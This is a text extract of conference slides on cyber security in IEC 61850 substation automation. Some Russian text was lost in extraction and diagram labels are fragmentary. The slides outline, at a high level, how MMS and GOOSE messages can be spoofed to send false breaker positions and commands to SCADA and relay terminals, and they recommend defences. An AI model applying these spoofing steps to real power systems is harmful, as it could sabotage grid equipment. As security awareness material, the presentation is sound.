If you can't read please download the document
View
47
Download
12
Embed Size (px)
DESCRIPTION
Cyber Security in Substation Automation(IEC 61850)
1
Braguta M.V., Nikandrov M.V.
August 2014 .
.
. .
. .
( , )
, .
, - . , - .
,
: , .
.
1
Recent trend: Migration to Ethernet/IP network protocols
High density of Electronic Intelligent Devices (IED) per controlled unit
Real time telemetry transmission is highly demanded
Lack of Security at the control device level, common practices of using default access parameters
Lack of Cyber Security knowledge and incident readiness
Modern Control Systems:
Trend and Risks
Major Risks:
Unauthorized remote access to control room, devices, manufacturing process,
Information theft, modification, altering network data,
Possible denial of service, sabotage of the manufacturing process
2
, , .
, , . .
2
Industry Incidents by Verticals
3
Energy
Energy sector is the most affected industry
3
The Attack Vectors
4
4
Information Disclosure:public websites
5
5
Social Networks Risks
6
(company)
(belgorodenergo)
(JSC MRSK-Centra belgorodenergo)
(Alexander has 516 friends)
USB devices: Major source of infection
7
7
Ransom Blockers at Control Room
8
IEC 61850 Capabilities
9
Advantage:
Promotion of high interoperability between systems from different vendors
Definition of basic services
Main protocols:
MMS and GOOSE
was
was
evolved
evolved
9
1. Spoofing of MMS
Sending false positioning control data to SCADA system
Record network traffic
Analyze transferred data
Construct message
Send to SCADA
10
10
Constructing Message
11
11
Sending to SCADA
http://youtu.be/MbxRhQP42N0
12
12
2. Spoofing MMS
Sending the false position of the breaker to relay protection terminal
Record network traffic
Analyze transferred data
Construct message
Send to Relay Terminal
13
13
Sending to Relay Terminal
http://youtu.be/oh5IAN3euK4
14
14
Result of unauthorized command
15
15
3. GOOSE spoofing - easy!
Record network traffic
Analyze transferred data
Edit message
Publish the message
16
Sending false commands to the relay terminal from another relay terminal
16
Edit the Message
17
17
Sending False GOOSE Message
http://youtu.be/fdnPkqIUWfA
18
18
Result of the Spoofing
19
GOOSE spoofing can applied to all relay terminals
certified by"Rosseti (Russian Power Company)
19
The IEC61850 standard supports RSA digital sign
Prevention and Protection
20
However, NONE of available IED Relays on market offer support for digital sign
20
Antivirus Issue: False Positive is quite dangerous
21
Suggestions
Short-term goals:
Stop ignoring the problem;
Allocate Cyber Security Personnel Education & Awareness time in Security Policy. Cover Basic Cyber Security and Social Engineering at least 1-2 per year;
Reduce attack surface and mitigate attack vectors using available methods and security standards;
Long-term goals:
Deploy Industrial Antivirus solutions certified for manufacturing zone;
Use Intrusion Detection and Deep packet inspection systems;
Add Integrity control system to protect manufacturing zone subnets and network assets. Detect unknown or unauthorized assets in the network perimeter;
Be able to isolate and manage devices firmware and detect unauthorized access or modifications;
Plan to migrate to encrypted network communications in manufacturing zone.
22
Conclusions
Power Control Systems need special, carefully designed Cyber Security Policy;
Overall state of Organization Cyber Security Policy is poor and demands immediate attention;
The Organization Cyber Security Policy must be reconsidered in general with respect of latest Local and International standards and advisories, the growing danger of ICS threats and lack of personnel readiness to detect threats;
The Power Control Systems requires Security Audit to all facilities as well as Compliance with modern Cyber Security standards and practices (local and international);
The Cyber Security requirements must be considered during design and implementation stages for all new objects and facilities;
All Cyber Security systems must go through extensive testing before to be installed into Control room or connected to power equipment. The testing should be done at manufacturing level as well as at Organization testing facilities in close to real world environment.
23
Thank you for your time!
Nikandrov Maksim
nixmak@mail.ru
Special appreciation to Kaspersky Lab
24
internet
Reley protection
terminal
object management
Router
Operator workstation 1
switches
220
W2E
K2E
QSG3.2
QW2E
QS3
QS2
QSG 2QSG3.1
Router
Operator workstation 2
Engineering
workstation
Redundant
server station
network ETHERNET
network ETHERNET
In a corporate
network
Control center
Engineering
workstation
Reley protection
terminal
Reley protection
terminal
Reley protection
terminal